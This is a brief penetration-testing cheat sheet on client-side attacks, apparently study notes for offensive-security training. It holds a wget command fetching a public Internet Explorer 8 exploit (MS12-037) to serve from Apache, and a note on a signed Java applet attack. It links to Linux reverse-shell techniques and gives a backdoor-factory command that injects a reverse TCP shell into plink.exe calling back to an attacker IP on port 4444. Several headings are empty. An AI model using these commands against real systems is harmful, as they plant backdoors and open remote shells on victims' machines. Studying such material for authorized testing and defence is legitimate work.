Client Attacks

MS12-037- Internet Explorer 8 Fixed Col Span ID
wget -O exploit.html http://www.exploit-db.com/download/24017
service apache2 start

JAVA Signed Jar client side attack
echo '' > /var/www/html/java.html
User must hit run on the popup that occurs.

Linux Client Shells
http://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/

Setting up the Client Side Exploit

Swapping Out the Shellcode

Injecting a Backdoor Shell into Plink.exe
backdoor-factory -f /usr/share/windows-binaries/plink.exe -H $ip -P 4444 -s reverse_shell_tcp